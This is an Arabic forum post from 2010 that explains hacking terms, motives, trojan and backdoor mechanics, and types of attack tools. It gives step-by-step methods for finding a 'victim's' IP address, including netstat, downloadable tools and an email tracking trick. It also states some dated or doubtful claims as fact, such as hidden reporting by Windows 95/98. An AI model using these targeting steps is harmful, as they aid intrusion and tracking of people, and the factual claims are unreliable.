طيبة الشيخ القرشي ودالزين
منتديات طيبة الشيخ القرشي ترحب بكم
نرجو التسجيل ايها الزائرالكريم ... انت غير مسجل
وخاصة ابناء طيبة الشيخ القرشي
nets

انضم إلى المنتدى ، فالأمر سريع وسهل

طيبة الشيخ القرشي ودالزين
منتديات طيبة الشيخ القرشي ترحب بكم
نرجو التسجيل ايها الزائرالكريم ... انت غير مسجل
وخاصة ابناء طيبة الشيخ القرشي
nets
طيبة الشيخ القرشي ودالزين
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

منتديات طيبه الشيخ القرشي ودالزين


أهلا وسهلا بك زائرنا الكريم, أنت لم تقم بتسجيل الدخول بعد! يشرفنا أن تقوم بالدخول أو التسجيل إذا رغبت بالمشاركة في المنتدى

ماهو الهكر .... كيف تصبح هكر...

اذهب الى الأسفل  رسالة [صفحة 1 من اصل 1]

1ماهو الهكر .... كيف تصبح هكر... Empty ماهو الهكر .... كيف تصبح هكر... الثلاثاء فبراير 02, 2010 2:16 pm

mohammed abusabah

mohammed abusabah
Admin

[color=red]
مـــــــــــــاهو الهكر:-
أطلقت هذة الكلمة اول ما أطلقت في الستينيات لتشير الي المبرمجين المهرة القادرين على التعامل مع الكمبيوتر ومشاكله بخبرة ودراية حيث أنهم وكانوا يقدمون حلولا لمشاكل البرمجة بشكل تطوعي في الغالب . بالطبع لم تكن الويندوز او مايعرف بالـ Graphical User Interface او GUI قد ظهرت في ذلك الوقت ولكن البرمجة بلغة البيسيك واللوغو والفورتوران في ذلك الزمن كانت جديرة بالأهتمام . ومن هذا المبداء غدى العارفين بتلك اللغات والمقدمين العون للشركات والمؤسسات والبنوك يعرفون بالهاكرز وتعني الملمين بالبرمجة ومقدمي خدماتهم للأخرين في زمن كان عددهم لايتجاوز بضع الوف على مستوى العالم أجمع. لذلك فإن هذا الوصف له مدلولات إيجابية ولايجب خلطه خطأ مع الفئة الأخرى الذين يسطون عنوه على البرامج ويكسرون رموزها بسبب إمتلاكهم لمهارات فئة الهاكرز الشرفاء. ونظرا لما سببته الفئة الأخيرة من مشاكل وخسائر لا حصر لها فقد أطلق عليهم إسما مرادفا للهاكرز ولكنه يتداول خطأ اليوم وهو (الكراكرز) Crackers.
كان الهاكرز في تلك الحقبة من الزمن يعتبرون عباقرة في البرمجة فالهاكر هو المبرمج الذي يقوم بتصميم أسرع البرامج والخالي في ذات الوقت من المشاكل والعيوب التي تعيق البرنامج عن القيام بدورة المطلوب منه. ولأنهم كذلك فقد ظهر منهم إسمان نجحا في تصميم وإرساء قواعد أحد البرامج المستخدمة اليوم وهما دينيس ريتشي وكين تومسون اللذان نجحا في اواخر الستينيات في إخراج برنامج اليونيكس الشهير الي حيز الوجود. لذلك فمن الأفضل عدم إطلاق لقب الهاكر على الأفراد الذين يدخلون عنوة الي الأنظمة بقصد التطفل او التخريب بل علينا إطلاق لقب الكراكرز عليهم وهي كلمة مأخوذة من الفعل Crack بالأنجليزية وتعني الكسر او التحطيم وهي الصفة التي يتميزون بها .
قد لايستصيغ البعض كلمة كراكرز التي ادعو بها المخربين هنا لأنه تعود على كلمة هاكرز ولكني سأستخدمها لأعني به المخربين لأنظمة الكمبيوتر وهم على كل حال ينقسمون الي قسمين :

المحترفون: هم إما أن يكونوا ممن يحملون درجات جامعية عليا تخصص كمبيوتر ومعلوماتية ويعملون محللي نظم ومبرمجين ويكونوا على دراية ببرامج التشغيل ومعرفة عميقة بخباياها والثغرات الموجودة بها. تنتشر هذة الفئة غالبا بأمريكا وأوروبا ولكن إنتشارهم بداء يظهر بالمنطقة العربية (لايعني هذا أن كل من يحمل شهادة عليا بالبرمجة هو باي حال من الأحوال كراكر) ولكنه متى ما إقتحم الأنظمة عنوة مستخدما اسلحته البرمجية العلمية في ذلك فهو بطبيعة الحال احد المحترفين.

الهواه: إما أن يكون احدهم حاملا لدرجة علمية تساندة في الأطلاع على كتب بلغات أخرى غير لغته كالأدب الإنجليزي او لديه هواية قوية في تعلم البرمجة ونظم التشغيل فيظل مستخدما للبرامج والتطبيقات الجاهزة ولكنه يطورها حسبما تقتضيه حاجته ولربما يتمكن من كسر شيفرتها البرمجية ليتم نسخها وتوزيعها بالمجان. هذا الصنف ظهر كثيرا في العامين الأخرين على مستوى المعمورة وساهم في إنتشارة عاملين . الأول: إنتشار البرامج المساعدة وكثرتها وسهولة التعامل معها . والأمر الثاني: إرتفاع اسعار برامج وتطبيقات الكمبيوتر الأصلية التي تنتجها الشركات مما حفز الهواة على إيجاد سبل أخرى لشراء البرامج الأصلية بأسعار تقل كثيرا عما وضع ثمنا لها من قبل الشركات المنتجه.
ينقسم الهواة كذلك الي قسمين :
الخبير: وهو شخص يدخل للأجهزة دون الحاق الضرر بها ولكنه يميل الي السيطرة على الجهاز فتجده يحرك الماوس عن بعد او يفتح مشغل الأقراص بقصد السيطرة لا أكثر .

المبتدي: هذا النوع أخطر الكراكرز جميعهم لأنه يحب أن يجرب برامج الهجوم دون أن يفقه تطبيقها فيستخدمها بعشوائية لذلك فهو يقوم أحيانا بدمار واسع دون أن يدري بما يفعله.

الكراكيز بالدول العريه:
للأسف الشديد كثير من الناس بالدول العربية يرون بأن الكراكرز هم أبطال بالرغم أن العالم كلة قد غير نظرته لهم. فمنذ دخول خدمة الأنترنت للدول العربية في العام 1996 تقريبا والناس يبحثون عن طرق قرصنه جديدة وقد ذكرت اخر الحصائيات بأن هناك اكثر من 80% من المستخدمين العرب تحتوي اجهزتهم على ملفات باتش وهي ملفات تسهل عمل الكراكرز.

الكراكيز دول الخليج العربى:
إنتشرت ثقافة الكراكرز كثيرا بدول الخليج العربي خصوصا بالسعودية على رغم دخولها المتأخر لخدمة الأنترنت (يناير 1999) حيث كثرت الشكاوي من عدة افراد وشركات وقد بين الأستبيان الذي أجرته مجلتين عربيتين متخصصتين هما بي سي و إنترنت العالم العربي أن بعض الأجهزة بالدول الخليجية تتعرض لمحاولات إختراق مرة واحدة على الأقل يوميا.

بوجه عام_ فالهاكرز يخترعون برامج و طرق جديدة معقدة يستطيعون من خلالها اختراق الشبكات و الأجهزة مهما كانت محمية. تختلف برامج التجسس في المميزات و طرق الاستخدام, ولكن الطرق التقليدية التي يستعملها الهاكرز المبتدئين جميعها تعتمد على فكرة واحدة و هي ما يسمى ( الملف اللاصق) (Patch file) و الذي يرسله المتجسس إلى جهاز الضحية عن طريق البريد الإلكتروني أو برامج المحادثة فيقوم الأخير بفتحه بحسن نية دون دراية منه أنه قام في نفس الوقت بفتح الباب على مصراعيه للمتجسس ليقوم بما يريد في جهازه, و في بعض الأحيان يستطيع المتجسس عمل ما لا يستطيع الضحية عمله في جهازه نفسه.

يتم الاختراق عن طريق معرفة الثغرات الموجودة في ذلك النظام و غالباً ما تكون تلك الثغرات في المنافذ (Ports) الخاصة بالجهاز, و يمكن وصف هذه المنافذ بأنها بوابات للكمبيوتر على الإنترنت. يستخدم الهاكر برامج تعتمد على نظام (الزبون/الخادم) (client/server) حيث أنها تحتوي على ملفين أحدهما هو الخادم (server) الذي يرسل إلى جهاز الضحية الذي يقوم بفتحه و يصبح عرضةً للاختراق حيث أنه تم فتح إحدى المنافذ بواسطة هذا الخادم.

.تعريــــــــف الاخــــــــــــــتراق:-

الاختراق بشكل عام هو القدرة على الوصول لهدف معين بطريقة غير مشروعة عن طريق ثغرات في نظام الحماية الخاص بالهدف ...وحينما نتكلم عن الاختراق بشكل عام فنقصد بذلك قدرة المخترق على الدخول الى جهاز شخص ما بغض النظر عن الاضرار التي قد يحدثها . واختراق الاجهزة هو كأي اختراق اخر لشي ما ... لة طرق واسس يستطيع من خلالها المخترق التطفل على أجهزة الاخرين عن طريق معرفة الثغرات الموجودة في ذلك النظام . هذا يعني انك معرض للاختراق في اي وقت وباي طريقة كانت وقد يستهدفك احد المخترقين -الهاكرز -لسبب ما او عشوئياكما يحصل غالبا , وربما يكون هذا الهاكر خبيرا فيمكنة اختراقك بحيث لاتحس بما يفعلة اتجاهك ::وعلى هذا فافضل طريقة هي عدم وضع اشيائك الهامة والخاصة داخل جهازك كرقم بطاقة الائتمان او ارقامك السرية , واتخاذ أساليب الحماية الممكنة التي تطرقن لها بتفصيل .

.أسباب الاختراق:-

**الدافع السياسي والعسكري **

مما لاشك فية التطور العلمي والتقني أدى الى الاعتماد بشكل شبة كامل على أنظمة الكمبيوتر في أغلب الاحتيا جات التقنية والمعلوماتية , واصبحت الدول المتقدمة علميا وتقنيا تعتمد على الشبكات في حفظ وادارت المعلومات , وكثير من هذة المعلومات هي معلومات خاصة وحساسة سياسيا وعسكريا واقتصاديا . ومنذ الحرب الباردة والصراع المعلوماتي والتجسسي بين الدولتين العظمتين على اشده , ولكن بالطرقق المناسبة لذلك الزمان . ومع بروز مناطق جديدة للصراع في العالم ,وتتغير الطبيعة المعلوماتية للانظمة والدول .أصبح الاعتماد على الحاسب الالي لابد منة . واصبح الاختراق من أجل الحصول على معلومات سياسية وعسكرية واقتصادية مسألة اكثر اهمية , واكثر سلامة وفعالية وسرعة من ارسال جاسوس مع احتمالية كشفة وتعريضه للمخاطر وقله المعلومات التي سيجلبها ومحدوديتها.

وقد أصبح هذا الدافع في الفترة الاخيرة مع تنامي المشاكل والعداءات السياسية ,وكمثال لذلك فقد أعلن البنتاجون انة قد تعرض لربع مليون اختراق في الايام القليلة التي تلت قصف حلف الناتو الذي تتزعمة أمريكا للسفارة الصينية في بلغراد الذي تدعي أمريكا بأنة غير مقصود مقصود نظرا لاعتمادة على خرئط قديمة للمنطقة المقصوفة.

وقد اصبحت حروب الشبكات في بعض الاحيان حروبا حقيقة تهدد أمن الدول وترتعد لها الفرائص في انتظار ضربة معلوماتية كما ترتعد عند توقع ضربة صاروخية ,كما حمات الاخبار في فترة ماضية قيام السلطة البريطانية بعمل تدابير لحماية بريطانيا من هجوم عراقي معلوماتي محتمل , ولم تأخد السلطات البريطانية بحمل الجد الا لمعرفتها المسبقة بخطورة الوضع والنتائج التي ستترتب علية لو ما لو تم.

ومانسمعة وتتناقلة وسائل الاعلام في هذا المجال فهو أقل القليل من كثير لانعلمة ويدور يوميا على شبكات الانترنت , ويكفي لاسيعاب ذلك.

**الدافع التجاري **

من المعروف ان الشركات التجارية الكبرى تعيش هي أيضا فيما بينها في حرب مستعارة,لذلك كان لابد من الحصول على معلومات تخص الشركات المنافسة ,وكانت هذة الشركات ولا زلت تتعامل مع بعض أجهزة المخابرات أوبعض العصابات أحيانا للحصول على المعلومات والوثائق ,ومع التطور المعلوماتي الحاصل ,اتجهت بعض الشركات والجهات الرغبة في الربح المادي والثراء السريع الى الاستعانة بلانظمة الحديثة للاختراق والحـصول على المعلومات .

وقد بينت الدراسات الحديثة أن عدد من كبريات الشركات يجري عليها أكثر من خمسين محاولة اختراق لشبكاتهم كل يوم .

وتبين من احصائية أخري لاكبر 560 شركة تعتمد في أعمالها على الانترنت أن اكثر من النصف قد أقروا بأ،نهم قد هوجموا بواسطة الهاكرز وان اكثر من ثلاثة ارباع الذين هوجموا بواسطة الهاكرز قد ههواجموا داخليا.

**الدافع الفردي **

والمقصود من الدافع الفردي كل مالم يدخل تحت الدافعين السابقين ,فنجد الكثير من هــواة ومحترفي الكمبيوتر يقضون الساعات الطوال أمام الاجهزة في التعلم والتطور ومحاولة الحصول على نتأئج جديدة, ومن ثم نشرها وتوزيعها ,والاتصال على الهاكرز الاخرين وتبادل المعلومات معهم .

ولا يقتصر هذا الدافع على أفراد بل انة توجد مجموعات ونقابات أشبة بالانديةليست ذات اهداف تجارية بالدرجة الرئيسية ,ذات كيان واضح وكثير منها مسجل رسميا ويعمل تحت حماية القانون في بعض الدول ,وتقوم هذه الجمعيات بالبحث والتطوير وتبادل المعلومات ونشرها بل والتنافس فيها بينها في اختراق الشبكات والانظمة .وهذا ما سنتطرق الية بالتفصيل .


.ميكانيكيه الاختراق:-

ميكانيكية الأختراق - كيف يتم وكيف ينجح

يعتمد الاختراق على السيطرة عن بعد Remote وهي لاتتم الا بوجود عاملين مهمين : الأول البرنامج المسيطر ويعرف بالعميل Client والثاني الخادم Server الذي يقوم بتسهيل عملية الأختراق ذاتها. وبعبارة أخرى لابد من توفر برنامج على كل من جهازي المخترق والضحية ففي جهاز الضحية يوجد برنامج الخادم وفي جهاز المخترق يوجد برنامج العميل .
تختلف طرق إختراق الأجهزة والنظم بإختلاف وسائل الإختراق ، ولكنها جميعا تعتمد على فكرة توفر إتصال عن بعد بين جهازي الضحية والذي يزرع به الخادم (server) الخاص بالمخترق ، وجهاز المخترق على الطرف الأخر حيث يوجد برنامج المستفيد او العميل Client وهناك ثلاث طرق شائعة لتنفيذ ذلك :


1) عن طريق ملفات أحصنة طروادة Trojan :
لتحقيق نظرية الأختراق لابد من توفر برنامج تجسسي يتم إرسالة وزرعة من قبل المستفيد في جهاز الضحيه ويعرف بالملف اللاصق ويسمى (الصامت) أحيانا وهوملف باتش patch صغير الحجم مهمته الأساسية المبيت بجهاز الضحيه (الخادم) وهو حلقة الوصل بينه وبين المخترق (المستفيد) .
كيفية الإرسال والاستقبال :
تقوم الفكرة هنا على إرسال ملف باتش صغير هذا الملف يعرف باسم حصان طروادة لأنه يقوم بمقام الحصان الخشبي الشهير في الأسطورة المعروفة الذي ترك امام الحصن وحين ادخله اليه الناس خرج من داخلة الغزاة فتمكنوا من السيطرة والإستيلا على الحصن . ملفنا الصغير الفتاك هذا ربما يكون اكثر خبثا من الحصان الخشبي بالرواية لأنه حالما يدخل لجهاز الضحية يغير من هيئته فلو فرضنا بأن إسمه mark.exe وحذرنا منه صديق فأننا سنجده يحمل اسما اخرا بعد يوم او يومين . لهذا السبب تكمن خطورة احصنه طراودة فهي من جانب تدخل للأجهزة في صمت وهدوء ، ويصعب اكتشافها من جانب اخر في حالة عدم وجود برنامج جيد مضاد للفيروسات .
لاتعتبر احصنة طروادة فيروسات وإن كانت برامج مضادات الفيروسات تعتبرها كذلك فهي بالمقام الأول ملفات تجسس ويمكن أن يسيطر من خلالها المستفيد سيطرة تامه على جهاز الضحية عن بعد وتكمن خطورتها في كونها لاتصدر اية علامات تدل على وجودها بجهاز الخادم.

كيفية الأرسال :
تتم عملية إرسال برامج التجسس بعدة طرق من اشهرها البريد الألكتروني حيث يقوم الضحية بفتح المرفقات المرسلة ضمن رسالة غير معروفة المصدر فيجد به برنامج الباتش المرسل فيظنه برنامجا مفيدا فيفتحه او أنه يفتحه من عامل الفضول ليجده لايعمل بعد فتحة فيتجاهلة ظانا بأنه معطوب ويهمل الموضوع بينما في ذلك الوقت يكون المخترق قد وضع قدمه الأولى بداخل الجهاز ( يقوم بعض الأشخاص بحذف الملف مباشرة عند إكتشافهم بأنه لايعمل ولكن يكون قد فات الأوان لأن ملف الباتش من هذا النوع يعمل فورا بعد فتحة وإن تم حذفه كما سنرى فيما بعد) .
هناك طرق أخرى لزرع أحصنه طروادة غير البريد الألكتروني كأنتقاله عبر المحادثة من خلال برنامج الـ ICQ وكذلك عن طريق إنزال بعض البرامج من احد المواقع الغير موثوق بها . كذلك يمكن اعادة تكوين حصان طروادة من خلال الماكرو الموجودة ببرامج معالجات النصوص.

كيفية الإستقبال:
عند زرع ملف الباتش في جهاز الضحية (الخادم) فأنه يقوم مباشرة بالأتجاه الي ملف تسجيل النظام Registry لأنه يؤدي ثلاثة امور رئيسية في كل مرة يتم فيها تشغيل الجهاز : (1) فتح بوابة او منفذ ليتم من خلالها الاتصال (2) تحديث نفسه وجمع المعلومات المحدثة بجهاز الضحية إستعدادا لأرسالها للمخترق فيما بعد (3) وتحديث بيانات المخترق (المستفيد) في الطرف الأخر . تكون المهمة الرئيسية لملف الباتش فور زرعة مباشرة فتح منفذ إتصال داخل الجهاز المصاب تمكن برامج المستفيد (برامج الإختراقات) من النفوذ. كما أنه يقوم بعملية التجسس بتسجيل كل مايحدث بجهاز الضحية او انه يقوم بعمل اشياء اخرى حسب مايطلبه منه المستفيد كتحريك الماوس او فتح باب محرك السي دي وكل ذلك يتم عن بعد.

بوابات الأتصال Ports
يتم الاتصال بين الجهازين عبر بوابات ports او منافذ اتصال وقد يظن البعض بأنها منافذ مادية في امكانه رؤيتها كمنافذ الطابعة والفأرة ولكنها في واقع الأمر جزء من الذاكرة له عنوان معين يتعرف علية الجهاز بأنه منطقة إتصال يتم عبره ارسال واستقبال البيانات ويمكن استخدام عدد كبير من المنافذ للأتصال وعددها يزيد عن 65000 يميز كل منفذ عن الاخر رقمه فمثلا المنفذ رقم 1001 يمكن اجراء اتصال عن طريقة وفي تفس اللحظه يتم استخدام المنفذ رقم 2001 لإجراء اتصال اخر.

التواصل :
قلنا بأن المخترق قد تمكن من وضع قدمة الأولى بداخل جهاز الضحية بعد زرع ملف الباتش به ورغم خطورة وجود هذا الملف بجهاز الضحية فأنه يبقى في حالة خمول طالما لم يطلب منه المخترق التحرك فهو مجرد خادم ينفذ مايصدر له من اوامر ولكن بدونه لايتمكن المخترق من السيطرة على جهاز الضحية عن بعد ، وحتى يتم له ذلك، فإن على المخترق بناء حلقة وصل متينه بينه وبين الخادم عن طريق برامج خاصة تعرف ببرامج الإختراق . من جانب اخر تبقى احصنة طروادة عديمة الفائدة إن لم يتمكن المخترق من التعامل معها وهي تفقد ميزتها الخطرة حالما يتم اكتشافها والتخلص منها. وهناك عامل ممتاز يساهم في تحقيق هذة الميزة فبرامج مضادات الفيروسات الجيدة تكتشف ملفات الباتش الحاملة لأحصنة طروادة وتمنعها من الدخول للأجهزة لهذا يؤكد كل من له المام بالمعلوماتية أن تزود دائما الأجهزة الشخصية ببرامج مضادات الفيروسات وتحديثها بين الحين والأخر لأنها الخطوة الأولى للوقاية من الأختراقات ، كذلك علينا أن نتعود على عدم تمكين عامل الفضول من الولوج الي انفسنا فلانفتح اية مرفقات للبريد الألكتروني مجهول المصدر مهما كانت المغريات
2) عن طريق الـ IP Address : (وسيتم معرفه طرقه لا حقاً حسب تقسيم الكتاب)
ذكرت بأن ملفات الباتش الحاملة لأحصنة طروادة هي حلقة الوصل بين المخترق والضحية ، ولكن في واقع الأمر فإن ملفات الباتش ليست إلا طريقة واحدة لتحقيق التواصل . عند إتصالك بالأنترنت تكون معرض لكشف الكثير من المعلومات عنك كعنوان جهازك وموقعه ومزود الخدمة الخاص بك وتسجيل كثير من تحركاتك على الشبكة. ولاتتعجب كثيرا حين تعلم بأن كثيرا من المواقع التي تزورها تفتح سجلا خاصا بك يتضمن عنوان الموقع الذي جئت منه IP Address ونوع الكمبيوتر والمتصفح الذي استخدمته بل وحتى نوع معالج جهازك وسرعته ومواصفات شاشاتك وتفاصيل كثيرة.
كيف تم معرفة كل ذلك ؟ يمكنك التحقق من هذا السؤال لو انك زرت الموقع التالي :
http://www.privacy.netاو الموقع التالي :
http://www.consumer.net/
بعد التسجيل اطلب من احد الموقعين فحص جهازك اثناء اتصالك بالأنترنت وستفاجأ بالنتيجة .
مبدئيا عنوانك الخاص بالأنترنت Internet Protocol او IP يكشف الكثير عنك فكل جهاز متصل بالشبكة يكون له رقم معين خاص به يعرف بأسم الـ IP Address وكل عنوان لموقع على الأنترنت يترجم الي IP Address الخاص بمزود الخدمة وبأختصار يكون الـ IP كرقم هوية خاص بكل من يعمل على الأنترنت.
حينما يتمكن مخترق محترف من معرفة رقم الـ IP الخاص بالضحية فأنه من خلالة يتمكن من الولوج الي الجهاز والسيطرة عليه خلال الفترة التي يكون فيها الضحية متصلا بالشبكة فقط ، ولكن هذا الخيار لايخدم المخترق كثيرا لأن السيرفر الخاص بمزود الخدمة يقوم بتغيير رقم الـ IP الخاص بالمشترك تلقائيا عند كل عملية دخول للشبكة . يمكنك أن تجرب ذلك بنفسك بالطريقة التالية:

أثناء إتصالك بالشبكة ومن قائمة إبداء إختر تشغيل واكتب الأمر التالي في المستطيل الظاهر : winipcfg سيظهر لك عنوان الـ IP اكتبه في ورقة صغيرة واقطع اتصالك . أعد الأتصال مرة اخرى بالشبكة وقم بالأجراء السابق ستجد أن عنوان الـ IP الخاص بك قد تغير.

3) عن طريق الكوكي Cookie :
يمكن ايضا تحقيق التواصل للأختراق عن طريق الكوكي Cookie وهي عباراة عن ملف صغير تضعة بعض المواقع التي يزورها المستخدم على قرصة الصلب . هذا الملف به اليات تمكن الموقع الذي يتبع له جمع وتخزين بعض البيانات عن الجهاز وعدد المرات التي زار المستخدم فيها الموقع كما وأنها تسرع عمليات نقل البيانات بين جهاز المستخدم والموقع فالهدف الأساسي منها هو تجاري ولكنه يساء إستخدامة من قبل بعض المبرمجين المتمرسين بلغة الجافا Jafa فهذة اللغة لديها قدرات عالية للتعمق اكثر لداخل الأجهزة والحصول على معلومات اكثر عن المستخدم. لايفضل منع الكوكيز كليا ولكن يمكن فلترتها من خلال المتصفح او ببعض البرامج كالجارد دوق .


أنواع برامج الأختراق:-

تتراوح المخاطر التي يتعرض لها المستخدم من مجرد ازعاج بسيط الي مستوى الكارثة وقد صنف المؤلفين الثلاثة هذة المخاطر الي اربعة اصناف:


القنابل وبرامج الطوفان Flooders/Bombers (سيتم وضع لنكات لبعض الفلودرس (فى قسم برامج هاكر) ولكن توخى الح>رفى استخدامها):-
حيث يفاجأ المستخدم بوجود مئات الرسائل في عنوانه الألكتروني او عبر برنامج الـ ICQ من اشخاص وعناوين لم يسمع بهم من قبل وهذا الصنف من المخاطر هو الأقل خطوره حيث انه يسبب ازعاجا ومضيعا للوقت لا اكثر .

الخداع Spoofing
وهو عملية تمويه وطمس للهويه حيث تتم سرقة حساب الدخول للأنترنت بأسم المستخدم فيجد ساعاته تنقص دون ان يستخدمها او يتم من خلالة سرقة كلمة السر في ساحات الحوار فتكتب مقالات لم يكتبها في حقيقة الأمر المستخدم الحقيقي.

التدمير من خلال برامج الـ Nukers
تقوم هذة البرامج بتعطيل نظام التشغيل ويتراوح خطرها بين تغيير الوقت بساعة النظام وبين توقف النظام كليا عن العمل وتوجد انواع منها تركز على برنامج معين لتدميره دون الحاق الضرر بنظام التشغيل ذاته.

الباب الخلفي Backdoor
هذا الصنف هو الأخطر وهو المحور الذي يدور حوله موضوع هذة الدوره الدراسية ، وهو الشائع بين كل المخترقين لأنه يجعل المخترق قادرا على الدخول لجهاز الضحية والسيطره عليه كليا او جزئيا بحسب البرنامج المستخدم . البعض يظن خطأ بأن الـ Backdoor اسم برنامج للأختراق ولكنه تعبير مجازي ويعني بالعربية الدخول من الباب الخلفي الغير مرئي وعن طريقة يتم دخول المخترقين لجهاز الضحية .

الاى بى*:-

كيفية معرفة الـ IP لأى شخص على النت

نظرا لأن الكثير من الأشخاص يسال دائما عن رقم IP وكيفية معرفته قمت بوضع هذا الموضوع ليسهل على الكثيير منا التعب وخاصة المبتدئين.

س:/ ماهو رقم IP ???
كل بساطه هو مكانك على النت يعني رقم وجودك على النت عندما تقوك بالدخول الي الإنترنت يقوم بمنحك هذا الرقم والذي يكون عاده على هذا الشكل 212.34.34.78 وطوال فترة تواجدك على الإنترنت يبقى رقمك كما هو الي ان تخرج منه وعندما تقوم بالدخول اليه مره ثانيه تاخذ رقم جديد يعني ان كل مرة تدخل فيها على الإنترنت تاخذ رقم جديد وهناك طرق كثيرة لمعرفه هذا الرقم منها الآتي:-

طريقة استخراج الأيبي الخاص بك
بالنسبة لويندوز 98--ME
من START ثم RUN اكتب الأمر التالي winipcfg

بالنسبة لويندوز XP
من START ثم RUN اكتب الأمر التالىcmd /k ipconfig
هنا طريقة معرفة الـ IP للضحيه

الطريقة الأولى استخراج ايبي الضحيه من خلال الماسنجر
في البداية أرسل للضحيه اي ملف او صورة او اي شيء وبعد ما توصل بنجاح تروح تفتح الدوس وطريقه فتحه كالآتي

تروح لــــ START ثم RUN وتكتب command أو Dosprmpt بعد ماتفتح شاشه الدوس السوداء تكتب هذا الأمر netstat -n مع ملاحظة المسافة بين الشرطة و الكلمة netstat -n

بعد كتابه الأمر يطلعك الشكل الأتي :-
Proto -- Local Address -- Foreign Addres -- State


Local Address هذا رقم الاي بي الخاص بيك انت
Foreign Address هنا تحصل رقم الاي بي بتاع الضحية اخر رقم فيهم
ٍState بتلاقي مكتوب قدام رقم الاي بي حق الضحيه اللي هو اخر واحد في Foreign Address تلاقي مكتوب TIME_WAIT
وبكده تكون انت عرفت رقم الاي بتاعك ورقم الاي بي للضحيه في نفس الوقت
بس .

الطريقة الثانيه من خلال الماسنجير

من خلال هذا البرنامج http://www.geocities.com/mondysite/mesn.zip طريقة البرنامج افتحه بيجيك مربع فوق على يسار اكتب فيه رقم الآي بي الخاص بك بعدين اظغط الزر اللي تحتهconvert IP address بعدين اظغط على الزر Listen
بيجيك وصله تحت تلقاها رقم طويل انسخها وعطها اللي قاعد تكلمه في الماسنجر وانتظر شوي بيجيك رقم الآي بي الخاص به في الجهه اليمنى وبكذا تكون وفرت على نفسك ارسال اي ملفات


الطريقة الثالثة
بدون تحميل برامج او اي شي اذا عندك برنامج جدار نار مثــل Fire Wall - ZONE ALARM - BLACK ICE

1-تجيب الIP الخاص بك ثم
2- تكتب الIP الخاص بك بالشكل هذا http:// 212.34.34.78
3- طبعا الارقام الي فوق افتراضية
4- بعد ما تحول الIP الخاص بيك لصورة لينك او وصلة تطلب من الضحيه الضغط عليه
5- الباحث اللى عند الضحيه راح يدفعه ناحيتك ناحيه اتصال جهازك بالنت
6- برنامج الفاير وول راح يعطيك اشاره انك متعرض لمحاولة اختراق من هذا الشخص ويعطيك رقم الأي بيه الخاص به بكل سهوله

الطريقة الرابعة عن طريق الإيميل
تروح تبعت للشخص اللي انت تبي تعرف الاي بي حقه اي ايميل من عندك وانت تكتب الايميل تزود عليه الامر
confirm.TO
يعني اذا فرضنا بريد الي تبي ترسل له ali@hotmail.com
يصير تضيف بعد عنوان البريدهذا الامر كانك تكتب الايميل يشكل العادي بهالشكل ali@hotmail.com.confirm.TO
وبهذت لما هو يفتح الرساله تجيك انت رساله تعلمك انه فتح رسالتك بنفس اللحظه الي هو فتحها وهو طبعا رقم الاي بي الخاص به
وطبعا هو ما راح يعرف .

الطريقة الخامسة عن طريق الإيميل ايضا
لنفرض ان احدا ارسل لك رساله وتريد أن تعرف الــIP بتاعه من رسالته في ((HOTMAIL)) من بريد الــHOTMAIL أختر options
بعدين اختر Mail Display Settings بعدين massage headers وغير الاختيار الى advanced
الحين رح لأي رسالة بتلقى IP لصاحب هذه الرسالة وبعض المعلومات الأخرى
الطريقة السادسة عن طريق برنامج ICQ
هناك طرق كثيرة لمعرف ال IP من خلال البرنامج اسهلها من خلال هذا البرنامج http://www.geocities.com/mondysite/ICQ_IP.zip
تفتحه مع الأي سي كيو بعدين راح يحفظ البرنامج TXT فاضي في مكان انت تحدده وبعدين عندما يكون احد متصل معاك على البرنامج تفتح TXT تلاقي رقم الأي سي كيو واسمه ورقم الأي بي بتاعه هذه اسهل طريقة .


الثغرات ألأمنيه

كثير من البرامج التي تستخدمها في حياتنا اليومية وخصوصا على الانترنت ,ليست بتلك القوة الأمنية الكافية لحماية المستخدم , حيث ان كثير منها ملئ بالثغرات الامنية غير المقصودة أو المقصودة أحيانا .

ونظرا لضخامة أحجام البرامج والأنظمة وخصوصا في الفترات الاخيرةلكثرة المميزات والخدمات التي تقدمها , فقد اتسعت الدئرة أيضا لتحتوي على كثير من الثغرات التي بأمكان الهاكرز المحترفين استغلالها والنفوذ من خلالها الى النظام او الجهاز الشخصي .

يستغرب البعض وقوع أمثال هذه الاخطاء والثغرات في أنظمة وبرامج شركات عريقة تمتلك أفضل المبرمجين والتقنيات على مستوي العالم -على أفتراض أن الثغرات الأمنية غير مقصودة - ولكن يبقي هؤلأء بشر يخطئون ويصيبون ومهما وصلو من العلم فستبقي هذه القضية سنة كونية ثابتة في حقهم وفي حق كل اليشر , ولذلك تصدر بصفة دورية برامج لتدارك الأخطاء الأمنية التي ظهرت بعد اصدار البرامج أو النظام .

اما الثغرات المقصوده:-

الثغرات الأمنية المقصودة أو التجسس المعتمد موضوع طرأ حديثا وتورط فية عدد من الشركات وخصوصا الكبيرة منها ,وذلك باضافة وظائف مخفية عن المستخدم تقوم بتسجيل بيانات المستخدم أو تحركاته واستخداماته لبرامج معينة ,وقد تراوح الدفع الى استخدام هذه الشركات لهذا الاسلوب بين الدافع التجاري والدافع السياسي وان كان الأول هو الأبراز بحسب مايظهر بالأمثلة التالية .

##اولا ##

عترفت شركت مايكروسوفت أخيرا بعد ان استمرت في الانكار لفترة طويلة أن نظم التشغيل 95/98 تقوم بارسال تقرير عن البرامج الموجودة في الجهاز لمثبت علية الى جهاز رئيسي سيرفر موجود في مقر الشركة ذلك العمل لحفظ حقوقها من خلال معرفة البرامج المقرصنة والبرامج الاصلية .

هذا يعني أن كل جهاز يستخدم أحد نظامي التشغيل السابقين وقد ارتبط بالانترنت أو بشبكة موصلة بالانترنت . قد تم ارسال تقرير عنة الى الشركة .....وقد ثبت أن بعض المستخدمين قام بتثبيت برامج لمايكروسوفت منسوخة على جهازة في وقت لم يكن هناك اتصال بالانترنت وقد عملت البرامج بشكل طبيعي , ولكن بعد الاتصال بـــــالانترنت وعند محاولة تشغيل بعض البرامج رفض الجهاز تشغيل البرامج وأعطي رسالة الى وجود خطاء مع طلب الاتصال بشركة .

ولعل هذه الوظائف المخفية والتي تقوم بالتجسس موجودة في الجزاء الخاص بشبكة مايكروسوفت .حيث يوجد برنامج معين يقوم عند استخدامك ل ام اس ان للاتصال بشبكة مايكروسوفت بقراءة جمبع المعلومات الخاصة بالبرامج المثبتة على جهازك وارسالها.

ثانياُ

